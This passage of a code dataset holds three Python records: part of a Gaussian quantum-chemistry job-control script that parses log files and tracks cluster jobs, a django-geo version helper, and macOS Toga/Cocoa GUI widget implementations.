break\n if states == 's1':\n res = re.match(r' Total Energy',line)\n if states == 't1':\n res = re.match(r' SCF Done',line)\n if res:\n res_list1.append(line)\n res = re.match(r'.*Standard orientation',line)\n if res:\n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline()\n j = 0\n while j < atom_num:\n res_list2.append(line)\n line = in_object.readline()\n j+=1\n str1 = re.compile(r'-*\\d+\\.\\d+')\n if res_list1:\n temp = str1.findall(res_list1[-1])\n energy_s1 = temp[-1]\n if res_list2:\n for i in range(atom_num):\n atom_pos.append(res_list2[-1-i])\n \n with open(outfile,'a') as out_object:\n out_object.write(tokens)\n out_object.write(' '+energy_s1+note1+'\\n')\n out_object.write(note2+'\\n')\n str1 = re.compile(r'-*\\d+\\.*\\d*')\n if atom_pos:\n for i in range(atom_num):\n temp = str1.findall(atom_pos[-1-i])\n #print temp\n out_object.write(' '+atom_syb[i+1]+' ')\n if float(temp[3])<0:\n out_object.write('%.6f' % float(temp[3]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[3]))\n out_object.write(' ')\n if float(temp[4])<0:\n out_object.write('%.6f' % float(temp[4]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[4]))\n out_object.write(' ')\n if float(temp[5])<0:\n out_object.write('%.6f' % float(temp[5]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[5]))\n out_object.write(' ')\n out_object.write('\\n')\n\n def __parse_xyz(self,fname):\n '''\n parse *.xyz file to obtain SMILES\n '''\n\n with open(fname,'r') as in_object:\n lines = in_object.readlines()\n temp = lines[-2]\n temp = temp.split()\n return temp[0]\n\n def all_mol_dir(self):\n '''\n the function returns the file info including molecular folders and files\n in the gdb folder\n '''\n return os.listdir(self.gdb)\n\n def parse_logfile(self,mol_dir):\n '''\n the function will parse all the *.log file\n after calculation is done\n and write all the information to the *.mols file\n '''\n\n temp = self.gdb + '/' + mol_dir\n if os.path.isdir(temp):\n molecular_dir = self.gdb +'/' + mol_dir + '/'\n molsfile = self.gdb 
+'/'+mol_dir+'/'+mol_dir+'.mols'\n            if not os.path.isfile(molsfile):\n                fname = molecular_dir+mol_dir+'.xyz'\n                smiles = self.__parse_xyz(fname)\n\n                work_dir = molecular_dir+'s0/'\n                # os.system('cd ...') only changes directory in a subshell, so\n                # change the working directory of this process instead\n                os.chdir(work_dir)\n                for files in os.listdir(work_dir):\n                    if re.match(r'.*\\.log',files):\n                        fname = files\n                        break\n                if re.match(r'.*\\.log',fname):\n                    temp = fname.split('_')\n                    out_file = molecular_dir+temp[0]+'_'+temp[1]+'.mols'\n                    fname = work_dir + fname\n                    self.__parse_log_s0(fname,out_file,smiles)\n\n                tokens = '------------------------------Excited State S1: energy(Ha),lifetime(au),structure(Angstrom)-----------------------------\\n'\n                note1 = ' #S1'\n                note2 = ' #S1 life'\n                work_dir = molecular_dir+'/s1/'\n                os.chdir(work_dir)\n                for files in os.listdir(work_dir):\n                    if re.match(r'.*\\.log',files):\n                        fname = files\n                        break\n                if re.match(r'.*\\.log',fname):\n                    fname = work_dir + fname\n                    self.__parse_log_s1t1(fname,'s1',out_file,tokens,note1,note2)\n\n                tokens = '------------------------------Excited State T1: energy(Ha),lifetime(au),structure(Angstrom)-----------------------------\\n'\n                note1 = ' #T1'\n                note2 = ' #T1 life'\n                work_dir = molecular_dir+'/t1/'\n                os.chdir(work_dir)\n                for files in os.listdir(work_dir):\n                    if re.match(r'.*\\.log',files):\n                        fname = files\n                        break\n                if re.match(r'.*\\.log',fname):\n                    fname = work_dir + fname\n                    self.__parse_log_s1t1(fname,'t1',out_file,tokens,note1,note2)\n                shutil.copy(molsfile,self.molsfile_dir)\n            else:\n                molsfile_in_dir = self.molsfile_dir+'/'+mol_dir+'.mols'\n                if not os.path.isfile(molsfile_in_dir):\n                    shutil.copy(molsfile,self.molsfile_dir)\n\n    def error_handle(self,mol_dir):\n        '''\n        the function handles failed calculations.\n        if the calculation of a molecule was terminated by any error,\n        the function handles it and returns true;\n        otherwise it just returns false.\n        Notice: the error handling just moves the failed calculation folder\n        to the gdb_error folder\n        '''\n\n        temp = self.gdb + '/' + mol_dir\n        if os.path.isdir(temp):\n            molsfile = self.gdb+'/'+mol_dir+'/'+mol_dir+'.mols'\n            s0logfile = self.gdb+'/'+mol_dir+'/'+'s0'+'/'+mol_dir+'_s0.log'\n            s1logfile = self.gdb+'/'+mol_dir+'/'+'s1'+'/'+mol_dir+'_s1.log'\n            t1logfile = self.gdb+'/'+mol_dir+'/'+'t1'+'/'+mol_dir+'_t1.log'\n            s0errorinfo = ''\n            s1errorinfo = ''\n            t1errorinfo = ''\n            mol_dir = self.gdb+'/'+mol_dir\n            if not os.path.isfile(molsfile):\n                if os.path.isfile(s0logfile):\n                    process = os.popen(\"grep 'Error termination' \"+s0logfile)\n                    s0errorinfo = process.read()\n                    process.close()\n                if os.path.isfile(s1logfile):\n                    process = os.popen(\"grep 'Error termination' \"+s1logfile)\n                    s1errorinfo = process.read()\n                    process.close()\n                if os.path.isfile(t1logfile):\n                    process = os.popen(\"grep 'Error termination' \"+t1logfile)\n                    t1errorinfo = process.read()\n                    process.close()\n\n                if s0errorinfo or s1errorinfo or t1errorinfo:\n                    if os.path.exists(mol_dir):\n                        shutil.move(mol_dir,self.gdb_error)\n                    return True\n                elif not s0errorinfo and not s1errorinfo and not t1errorinfo:\n                    if not os.path.isfile(s0logfile) or not os.path.isfile(s1logfile) or not os.path.isfile(t1logfile):\n                        shutil.move(mol_dir,self.gdb_error)\n                        return True\n        return False\n\n    def job_is_done(self):\n        '''\n        the function checks if all the calculations are done\n        done: return true\n        otherwise return false\n        '''\n        a = os.popen('qstat | grep '+self.user+' | wc -l')\n        jobnumber = int(a.read())\n        if jobnumber==1:\n            if not self.all_mol_dir():\n                return True\n\n    def calculation_is_checked(self,mol_dir):\n        '''\n        the function checks if the calculation of a 
molecular is done\n if the job is done, return true\n otherwise return false\n '''\n\n s0logfile = self.gdb+'/'+mol_dir+'/'+'s0'+'/'+mol_dir+'_s0.log'\n s1logfile = self.gdb+'/'+mol_dir+'/'+'s1'+'/'+mol_dir+'_s1.log'\n t1logfile = self.gdb+'/'+mol_dir+'/'+'t1'+'/'+mol_dir+'_t1.log'\n s0info = ''\n s1info = ''\n t1info = ''\n\n if os.path.isfile(s0logfile):\n process = os.popen(\"grep 'termination' \"+s0logfile)\n s0info = process.read()\n process.close()\n if os.path.isfile(s1logfile):\n process = os.popen(\"grep 'termination' \"+s1logfile)\n s1info = process.read()\n process.close()\n if os.path.isfile(t1logfile):\n process = os.popen(\"grep 'termination' \"+t1logfile)\n t1info = process.read() \n process.close()\n if s0info and s1info and t1info:\n return True\n return False\n\n def mv2gdb_done(self,mol_dir):\n '''\n the function move the molecular dir to the gdb_done dir\n '''\n molecular_dir = self.gdb + '/' + mol_dir\n shutil.move(molecular_dir,self.gdb_done)\n\n def my_sleep(self):\n '''\n the process would sleep 300s\n once the function is called\n '''\n sleep(300)\n\n\n\n\n","sub_path":"gaussianjobcontrol.py","file_name":"gaussianjobcontrol.py","file_ext":"py","file_size_in_byte":28727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"482848774","text":"NAME = 'django-geo'\nVERSION = __version__ = (0, 2, 1, 'beta', 1)\n__author__ = 'sax'\n\ndef get_version(version=None, short=False):\n \"\"\"Derives a PEP386-compliant version number from VERSION.\"\"\"\n if version is None:\n version = VERSION\n assert len(version) == 5\n assert version[3] in ('alpha', 'beta', 'rc', 'final')\n\n # Now build the two parts of the version number:\n # main = X.Y[.Z]\n # sub = .devN - for pre-alpha releases\n # | {a|b|c}N - for alpha, beta and rc releases\n\n parts = 2 if version[2] == 0 else 3\n main = '.'.join(str(x) for x in version[:parts])\n\n sub = ''\n if version[3] == 'alpha' and version[4] == 0:\n sub = '.dev'\n if not short:\n import geo\n path = geo.__path__[0]\n head_path = '%s/../.git/logs/HEAD' % path\n try:\n for line in open(head_path):pass\n revision = line.split()[0]\n except IOError:\n raise Exception('Aplha version is are only allowed as git clone')\n sub += revision\n\n elif version[3] != 'final':\n mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}\n sub = mapping[version[3]] + str(version[4])\n\n return main + sub\n","sub_path":"geo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"354909122","text":"# -*- coding: utf-8 -*-\n\n# system imports\nimport os.path as osp\nimport platform\n\n# external imports\nfrom travertino.size import at_least\nfrom rubicon.objc import (\n NSMakeSize,\n NSZeroPoint,\n CGRectMake,\n ObjCClass,\n objc_method,\n SEL,\n at,\n)\nfrom toga.constants import LEFT, TRANSPARENT\nfrom toga_cocoa.libs import (\n NSColor,\n NSString,\n NSTextView,\n NSTextAlignment,\n NSRecessedBezelStyle,\n NSViewMaxYMargin,\n NSMenuItem,\n NSMenu,\n NSApplication,\n NSObject,\n NSApplicationActivationPolicyAccessory,\n NSApplicationActivationPolicyRegular,\n NSImage,\n NSImageInterpolationHigh,\n NSGraphicsContext,\n NSRect,\n NSPoint,\n NSBezierPath,\n NSTextField,\n NSPopUpButton,\n NSOpenPanel,\n NSFileHandlingPanelOKButton,\n NSCompositingOperationCopy,\n NSURL,\n NSButton,\n NSRoundedBezelStyle,\n NSSwitchButton,\n)\nfrom toga_cocoa.colors import native_color\nfrom toga_cocoa.keys import 
cocoa_key\nfrom toga_cocoa.app import App as TogaApp\nfrom toga_cocoa.widgets.base import Widget\nfrom toga_cocoa.widgets.button import Button as TogaButton\nfrom toga_cocoa.window import Window as TogaWindow\nfrom toga_cocoa.window import WindowDelegate as TogaWindowDeletage\nfrom toga_cocoa.widgets.multilinetextinput import (\n MultilineTextInput as TogaMultilineTextInput,\n)\nfrom toga_cocoa.factory import ImageView\nfrom toga_cocoa.factory import * # noqa: F401,F406\n\n# local imports\nfrom . import dialogs\nfrom .constants import (\n NSButtonTypeMomentaryPushIn,\n NSFocusRingTypeNone,\n NSControlState,\n NSSquareStatusItemLength,\n NSWindowAnimationBehaviorDefault,\n NSWindowAnimationBehaviorAlertPanel,\n NSUTF8StringEncoding,\n NSImageLeading,\n NSCompositeSourceOver,\n NSImageNameFollowLinkFreestandingTemplate,\n NSImageNameInvalidDataFreestandingTemplate,\n NSImageNameRefreshFreestandingTemplate,\n NSImageNameRevealFreestandingTemplate,\n NSImageNameStopProgressFreestandingTemplate,\n)\nfrom ...constants import (\n WORD_WRAP,\n CHARACTER_WRAP,\n CLIP,\n TRUNCATE_HEAD,\n TRUNCATE_MIDDLE,\n TRUNCATE_TAIL,\n ON,\n OFF,\n MIXED,\n ImageTemplate,\n)\n\n\nNSWorkspace = ObjCClass(\"NSWorkspace\")\nNSVisualEffectView = ObjCClass(\"NSVisualEffectView\")\nNSMutableAttributedString = ObjCClass(\"NSMutableAttributedString\")\nNSStatusBar = ObjCClass(\"NSStatusBar\")\nNSColorSpace = ObjCClass(\"NSColorSpace\")\n\nNSNormalWindowLevel = 0\nNSModalPanelWindowLevel = 8\n\n\nmacos_version, *_ = platform.mac_ver()\n\n\n# ==== icons ===========================================================================\n\n\nclass Icon:\n \"\"\"Reimplements toga.Icon but provides the icon for the file / folder type\n instead of loading an icon from the file content.\"\"\"\n\n _to_cocoa_template = {\n None: None,\n ImageTemplate.Refresh: NSImageNameRefreshFreestandingTemplate,\n ImageTemplate.FollowLink: NSImageNameFollowLinkFreestandingTemplate,\n ImageTemplate.Reveal: NSImageNameRevealFreestandingTemplate,\n ImageTemplate.InvalidData: NSImageNameInvalidDataFreestandingTemplate,\n ImageTemplate.StopProgress: NSImageNameStopProgressFreestandingTemplate,\n }\n\n def __init__(self, interface, path=None, for_path=None, template=None):\n self.interface = interface\n self.interface._impl = self\n self.path = str(path) if path else None\n self.for_path = for_path\n self.template = template\n\n self._native = None\n\n @property\n def native(self):\n\n if self._native:\n return self._native\n\n if self.path:\n self._native = NSImage.alloc().initWithContentsOfFile(self.path)\n return self._native\n\n elif self.for_path:\n # always return a new pointer since an old one may be invalidated\n # icons are cached by AppKit anyways\n path = str(self.for_path)\n if osp.exists(path):\n return NSWorkspace.sharedWorkspace.iconForFile(path)\n else:\n _, extension = osp.splitext(path)\n return NSWorkspace.sharedWorkspace.iconForFileType(extension)\n\n elif self.template:\n cocoa_template = Icon._to_cocoa_template[self.template]\n self._native = NSImage.imageNamed(cocoa_template)\n return self._native\n\n\n# ==== labels ==========================================================================\n\n\ndef attributed_str_from_html(raw_html, font=None, color=None):\n \"\"\"Converts html to a NSAttributed string using the system font family and color.\"\"\"\n\n html_value = \"\"\"\n <span style=\"font-family: '{0}'; font-size: {1}; color: {2}\">\n {3}\n </span>\n \"\"\"\n font_family = font.fontName if font else \"system-ui\"\n font_size = 
font.pointSize if font else 13\n    color = color or NSColor.labelColor\n    c = color.colorUsingColorSpace(NSColorSpace.deviceRGBColorSpace)\n    # CSS rgb() expects the red, green and blue components in that order\n    c_str = (\n        f\"rgb({c.redComponent * 255},{c.greenComponent * 255},{c.blueComponent * 255})\"\n    )\n    html_value = html_value.format(font_family, font_size, c_str, raw_html)\n    nsstring = NSString(at(html_value))\n    data = nsstring.dataUsingEncoding(NSUTF8StringEncoding)\n    attr_str = NSMutableAttributedString.alloc().initWithHTML(\n        data,\n        documentAttributes=None,\n    )\n    return attr_str\n\n\nclass Label(Widget):\n    \"\"\"Reimplements toga_cocoa.Label with text wrapping.\"\"\"\n\n    _toga_to_cocoa_linebreakmode = {\n        WORD_WRAP: 0,\n        CHARACTER_WRAP: 1,\n        CLIP: 2,\n        TRUNCATE_HEAD: 3,\n        TRUNCATE_TAIL: 4,\n        TRUNCATE_MIDDLE: 5,\n    }\n\n    def create(self):\n        self.native = NSTextField.labelWithString(\"\")\n        self.native.impl = self\n        self.native.interface = self.interface\n\n        # Add the layout constraints\n        self.add_constraints()\n\n    def set_alignment(self, value):\n        self.native.alignment = NSTextAlignment(value)\n\n    def set_color(self, value):\n        if value:\n            self.native.textColor = native_color(value)\n\n    def set_font(self, font):\n        if font:\n            self.native.font = font.bind(self.interface.factory).native\n\n    def set_text(self, value):\n        self.native.stringValue = value\n\n    def set_linebreak_mode(self, value):\n        self.native.cell.lineBreakMode = Label._toga_to_cocoa_linebreakmode[value]\n\n    def set_background_color(self, color):\n        if color in (None, TRANSPARENT):\n            self.native.backgroundColor = NSColor.clearColor\n            self.native.drawsBackground = False\n        else:\n            self.native.backgroundColor = native_color(color)\n            self.native.drawsBackground = True\n\n    def rehint(self):\n\n        if self.interface.style.width:\n            self.native.preferredMaxLayoutWidth = self.interface.style.width\n\n        content_size = self.native.intrinsicContentSize()\n\n        if self.interface.style.width:\n            self.interface.intrinsic.width = at_least(content_size.width)\n            self.interface.intrinsic.height = at_least(content_size.height)\n        else:\n            self.interface.intrinsic.width = at_least(0)\n            self.interface.intrinsic.height = at_least(content_size.height)\n\n\nclass RichLabel(Widget):\n    \"\"\"A multiline text view with html support.\"\"\"\n\n    def create(self):\n        self._color = None\n        self.native = NSTextView.alloc().init()\n        self.native.impl = self\n        self.native.interface = self.interface\n\n        self.native.drawsBackground = False\n        self.native.editable = False\n        self.native.selectable = True\n        self.native.textContainer.lineFragmentPadding = 0\n\n        self.native.bezeled = False\n\n        # Add the layout constraints\n        self.add_constraints()\n\n    def set_html(self, value):\n        attr_str = attributed_str_from_html(value, color=self._color)\n        self.native.textStorage.setAttributedString(attr_str)\n        self.rehint()\n\n    def set_font(self, font):\n        native_font = font.bind(self.interface.factory).native\n        attr_str = attributed_str_from_html(\n            self.interface.html, color=self._color, font=native_font\n        )\n        self.native.textStorage.setAttributedString(attr_str)\n        self.rehint()\n\n    def set_color(self, value):\n        if value:\n            self._color = native_color(value)\n\n        # update html\n        self.set_html(self.interface.html)\n\n    def rehint(self):\n        # force layout and get layout rect\n        self.native.layoutManager.glyphRangeForTextContainer(self.native.textContainer)\n        rect = self.native.layoutManager.usedRectForTextContainer(\n            self.native.textContainer\n        )\n\n        self.interface.intrinsic.width = at_least(rect.size.width)\n        self.interface.intrinsic.height = rect.size.height\n\n\n# 
==== text input ======================================================================\n\n\nclass RichMultilineTextInput(TogaMultilineTextInput):\n \"\"\"A scrollable text view with html support.\"\"\"\n\n def set_html(self, value):\n attr_str = attributed_str_from_html(value, font=self.text.font)\n self.text.textStorage.setAttributedString(attr_str)\n\n\n# ==== buttons =========================================================================\n\n\nclass FreestandingIconButton(TogaButton):\n \"\"\"A styled button with an icon.\"\"\"\n\n def create(self):\n super().create()\n self.native.showsBorderOnlyWhileMouseInside = True\n self.native.bordered = False\n self.native.buttonType = NSButtonTypeMomentaryPushIn\n self.native.bezelStyle = NSRecessedBezelStyle\n self.native.imagePosition = NSImageLeading\n self.native.alignment = NSTextAlignment(LEFT)\n self.native.focusRingType = NSFocusRingTypeNone\n\n def set_label(self, label):\n self.native.title = \" {}\".format(self.interface.label)\n\n def set_icon(self, icon_iface):\n icon = icon_iface.bind(self.interface.factory)\n if self.interface.style.height > 0:\n icon_size = self.interface.style.height\n else:\n icon_size = 16\n self.native.image = resize_image_to(icon.native, icon_size)\n self.native.image.template = True\n\n\nclass SwitchTarget(NSObject):\n @objc_method\n def onPress_(self, obj) -> None:\n if self.interface.on_toggle:\n self.interface.on_toggle(self.interface)\n\n self.impl.native.allowsMixedState = False\n\n\nclass Switch(Widget):\n \"\"\"Similar to toga_cocoa.Switch but allows *programmatic* setting of\n an intermediate state.\"\"\"\n\n _to_cocoa = {OFF: 0, MIXED: -1, ON: 1}\n _to_toga = {0: OFF, -1: MIXED, 1: ON}\n\n def create(self):\n self.native = NSButton.alloc().init()\n self.native.bezelStyle = NSRoundedBezelStyle\n self.native.setButtonType(NSSwitchButton)\n self.native.autoresizingMask = NSViewMaxYMargin | NSViewMaxYMargin\n\n self.target = SwitchTarget.alloc().init()\n self.target.interface = self.interface\n self.target.impl = self\n\n self.native.target = self.target\n self.native.action = SEL(\"onPress:\")\n\n # Add the layout constraints\n self.add_constraints()\n\n def set_label(self, label):\n self.native.title = self.interface.label\n\n def set_state(self, value):\n self.native.allowsMixedState = value == MIXED\n self.native.state = self._to_cocoa[value]\n\n def set_is_on(self, value):\n self.set_state(int(value))\n\n def get_is_on(self):\n return bool(self.native.state)\n\n def get_state(self):\n return self._to_toga[self.native.state]\n\n def set_font(self, font):\n if font:\n self.native.font = font.bind(self.interface.factory).native\n\n def rehint(self):\n content_size = self.native.intrinsicContentSize()\n self.interface.intrinsic.height = 20\n self.interface.intrinsic.width = at_least(content_size.width)\n\n def set_on_toggle(self, handler):\n pass\n\n\nclass FileChooserTarget(NSObject):\n @objc_method\n def onSelect_(self, obj) -> None:\n if self.impl.native.indexOfSelectedItem == 2:\n\n self.impl.native.selectItemAtIndex(0)\n\n panel = NSOpenPanel.alloc().init()\n panel.title = self.interface.dialog_title\n panel.message = self.interface.dialog_message\n panel.canChooseFiles = self.interface.select_files\n panel.canChooseDirectories = self.interface.select_folders\n panel.canCreateDirectories = True\n panel.resolvesAliases = True\n panel.allowsMultipleSelection = False\n panel.directoryURL = NSURL.fileURLWithPath(\n osp.dirname(self.interface.current_selection)\n )\n panel.prompt = \"Select\"\n\n 
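# Note: beginSheetModalForWindow below returns immediately; the user's choice\n            # is delivered asynchronously to completion_handler, so anything that depends\n            # on the selection has to happen inside that callback.\n            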
def completion_handler(r: int) -> None:\n\n if r == NSFileHandlingPanelOKButton:\n self.impl.set_current_selection(str(panel.URL.path))\n\n if self.interface.on_select:\n self.interface.on_select(self.interface)\n\n panel.beginSheetModalForWindow(\n self.interface.window._impl.native, completionHandler=completion_handler\n )\n\n\nclass FileSelectionButton(Widget):\n def create(self):\n self.native = NSPopUpButton.alloc().init()\n self.target = FileChooserTarget.alloc().init()\n self.target.interface = self.interface\n self.target.impl = self\n self.native.target = self.target\n self.native.action = SEL(\"onSelect:\")\n\n self._current_selection = \"\"\n self.native.addItemWithTitle(\"\")\n self.native.menu.addItem(NSMenuItem.separatorItem())\n self.native.addItemWithTitle(\"Choose...\")\n\n self.add_constraints()\n\n def get_current_selection(self):\n return self._current_selection\n\n def set_current_selection(self, path):\n\n if not osp.exists(path) and not self.interface.select_files:\n # use generic folder icon\n image = NSWorkspace.sharedWorkspace.iconForFile(\"/usr\")\n else:\n # use actual icon for file / folder, falls back to generic file icon\n image = NSWorkspace.sharedWorkspace.iconForFile(path)\n\n item = self.native.itemAtIndex(0)\n item.title = path if self.interface.show_full_path else osp.basename(path)\n item.image = resize_image_to(image, 16)\n self._current_selection = path\n\n def set_on_select(self, handler):\n pass\n\n def set_select_files(self, value):\n pass\n\n def set_select_folders(self, value):\n pass\n\n def set_dialog_title(self, value):\n pass\n\n def set_show_full_path(self, value):\n item = self.native.itemAtIndex(0)\n path = self.interface.current_selection\n item.title = path if value else osp.basename(path)\n\n def set_dialog_message(self, value):\n pass\n\n def rehint(self):\n content_size = self.native.intrinsicContentSize()\n self.interface.intrinsic.height = content_size.height + 1\n self.interface.intrinsic.width = at_least(\n max(self.interface.MIN_WIDTH, content_size.width)\n )\n\n\n# ==== menus and status bar ============================================================\n\n\nclass TogaMenuItem(NSMenuItem):\n @objc_method\n def onPress_(self, obj) -> None:\n if self.interface.action:\n self.interface.action(self.interface)\n\n\nclass MenuItem:\n def __init__(self, interface):\n self.interface = interface\n self.native = TogaMenuItem.alloc().init()\n self.native.interface = self.interface\n self.native.impl = self\n self.native.target = self.native\n self.native.action = SEL(\"onPress:\")\n\n def set_enabled(self, enabled):\n self.native.enabled = enabled\n\n def set_icon(self, icon):\n if icon:\n icon = icon.bind(self.interface.factory)\n nsimage = resize_image_to(icon.native, 16)\n self.native.image = nsimage\n else:\n self.native.image = None\n\n def set_label(self, label):\n self.native.title = label\n\n def set_submenu(self, menu_impl):\n if menu_impl:\n self.native.submenu = menu_impl.native\n self.native.enabled = True\n else:\n self.native.submenu = None\n\n def set_action(self, action):\n pass\n\n def set_checked(self, yes):\n self.native.state = NSControlState(yes)\n\n def set_shortcut(self, shortcut):\n if shortcut:\n key, modifier = cocoa_key(shortcut)\n\n self.native.keyEquivalent = key\n if modifier:\n self.native.keyEquivalentModifierMask = modifier\n\n\nclass MenuItemSeparator:\n def __init__(self, interface):\n self.interface = interface\n self.native = NSMenuItem.separatorItem()\n self.native.retain()\n\n\nclass TogaMenu(NSMenu):\n 
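# TogaMenu serves as its own NSMenuDelegate (Menu.__init__ below assigns\n    # native.delegate = native), so these callbacks run when the menu opens\n    # and closes and keep the impl's _visible flag up to date.\n    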
@objc_method\n def menuWillOpen_(self, obj) -> None:\n self.impl._visible = True\n if self.interface.on_open:\n self.interface.on_open(self.interface)\n\n @objc_method\n def menuDidClose_(self, obj) -> None:\n self.impl._visible = False\n if self.interface.on_close:\n self.interface.on_close(self.interface)\n\n\nclass Menu:\n def __init__(self, interface):\n self.interface = interface\n self._visible = False\n\n self.native = TogaMenu.alloc().init()\n self.native.autoenablesItems = False\n\n self.native.impl = self\n self.native.interface = self.interface\n self.native.delegate = self.native\n\n def add_item(self, item_impl):\n self.native.addItem(item_impl.native)\n\n def insert_item(self, index, item_impl):\n self.native.insertItem(item_impl.native, atIndex=index)\n\n def remove_item(self, item_impl):\n self.native.removeItem(item_impl.native)\n\n @property\n def visible(self):\n return self._visible\n\n\n# ==== StatusBarItem ===================================================================\n\n\nclass StatusBarItem:\n MARGIN = 2\n\n def __init__(self, interface):\n self.interface = interface\n self.native = NSStatusBar.systemStatusBar.statusItemWithLength(\n NSSquareStatusItemLength\n )\n self.size = NSStatusBar.systemStatusBar.thickness\n\n def set_icon(self, icon):\n icon = icon.bind(self.interface.factory)\n nsimage = resize_image_to(icon.native, self.size - 2 * self.MARGIN)\n nsimage.template = True\n self.native.button.image = nsimage\n\n def set_menu(self, menu_impl):\n self.native.menu = menu_impl.native\n\n\n# ==== Application =====================================================================\n\n\nclass SystemTrayAppDelegate(NSObject):\n @objc_method\n def applicationWillTerminate_(self, sender):\n if self.interface.app.on_exit:\n self.interface.app.on_exit(self.interface.app)\n\n @objc_method\n def selectMenuItem_(self, sender) -> None:\n cmd = self.impl._menu_items[sender]\n if cmd.action:\n cmd.action(None)\n\n\nclass SystemTrayApp(TogaApp):\n\n _MAIN_WINDOW_CLASS = None\n\n def _create_app_commands(self):\n # Hack: we use _create_app_commands here to inject our own modifications\n # into the superclass create command *before* the actual GUI is loaded.\n\n self.delegate = SystemTrayAppDelegate.alloc().init()\n self.delegate.impl = self\n self.delegate.interface = self.interface\n self.delegate.native = self.native\n self.native.delegate = self.delegate\n\n def select_file(self):\n pass\n\n def open_document(self, path):\n pass\n\n def has_open_windows(self):\n\n visible_windows = [\n w\n for w in self.native.windows\n if w.isVisible and w.objc_class.name != \"NSStatusBarWindow\"\n ]\n\n return len(visible_windows) > 1\n\n def show_dock_icon(self):\n self.native.activationPolicy = NSApplicationActivationPolicyRegular\n\n def hide_dock_icon(self):\n self.native.activationPolicy = NSApplicationActivationPolicyAccessory\n\n async def alert_async(\n self,\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n ):\n\n return await dialogs.alert_async(\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n )\n\n def alert(\n self,\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n ):\n\n return dialogs.alert(\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n )\n\n\nclass WindowDeletage(TogaWindowDeletage):\n @objc_method\n def windowWillClose_(self, notification) -> None:\n\n if not 
self.interface.is_dialog:\n if not self.interface.app._impl.has_open_windows():\n self.interface.app._impl.hide_dock_icon()\n\n\nclass Window(TogaWindow):\n def create(self):\n super().create()\n self.delegate = WindowDeletage.alloc().init()\n self.delegate.interface = self.interface\n self.delegate.impl = self\n self.native.delegate = self.delegate\n self.app = NSApplication.sharedApplication\n\n def cocoa_windowShouldClose(self):\n if self.interface.on_close:\n should_close = self.interface.on_close(self)\n else:\n should_close = True\n\n return should_close\n\n def is_visible(self):\n return bool(self.native.isVisible)\n\n def center(self):\n self.native.center()\n\n def force_to_front(self):\n self.native.makeKeyAndOrderFront(None)\n\n def show_as_sheet(self, window):\n window._impl.native.beginSheet(self.native, completionHandler=None)\n\n def show(self):\n if not self.interface.is_dialog:\n self.app.activationPolicy = NSApplicationActivationPolicyRegular\n self.app.activateIgnoringOtherApps(True)\n super().show()\n\n def close(self):\n\n if self.native.sheetParent:\n # End sheet session.\n self.native.sheetParent.endSheet(self.native)\n elif self.interface.closeable:\n # Mimic the press of the close button.\n self.native.performClose(self.native)\n else:\n # Window has no close button -> performClose does not work.\n # Get close confirmation and close if ok.\n if self.cocoa_windowShouldClose():\n self.native.close()\n\n def set_release_on_close(self, value):\n self.native.releasedWhenClosed = value\n\n def set_dialog(self, value):\n\n if value:\n self.native.animationBehavior = NSWindowAnimationBehaviorAlertPanel\n self.native.level = NSModalPanelWindowLevel\n else:\n self.native.animationBehavior = NSWindowAnimationBehaviorDefault\n self.native.level = NSNormalWindowLevel\n\n # dialogs\n\n async def save_file_sheet(self, title, message, suggested_filename, file_types):\n return await dialogs.save_file_sheet(\n self.interface, suggested_filename, title, message, file_types\n )\n\n async def open_file_sheet(\n self, title, message, initial_directory, file_types, multiselect\n ):\n return await dialogs.open_file_sheet(\n self.interface, title, message, file_types, multiselect\n )\n\n async def select_folder_sheet(self, title, message, initial_directory, multiselect):\n return await dialogs.select_folder_sheet(\n self.interface, title, message, multiselect\n )\n\n async def alert_sheet(\n self,\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n ):\n return await dialogs.alert_sheet(\n self.interface,\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n )\n\n\n# ==== helpers =========================================================================\n\n\ndef apply_round_clipping(image_view_impl: ImageView) -> None:\n \"\"\"Clips an image in a given toga_cocoa.ImageView to a circular mask.\"\"\"\n\n image = image_view_impl.native.image # get native NSImage\n\n composed_image = NSImage.alloc().initWithSize(image.size)\n composed_image.lockFocus()\n\n ctx = NSGraphicsContext.currentContext\n ctx.saveGraphicsState()\n ctx.imageInterpolation = NSImageInterpolationHigh\n\n image_frame = NSRect(NSPoint(0, 0), image.size)\n clip_path = NSBezierPath.bezierPathWithRoundedRect(\n image_frame, xRadius=image.size.width / 2, yRadius=image.size.height / 2\n )\n clip_path.addClip()\n\n zero_rect = NSRect(NSPoint(0, 0), NSMakeSize(0, 0))\n image.drawInRect(\n image_frame, fromRect=zero_rect, 
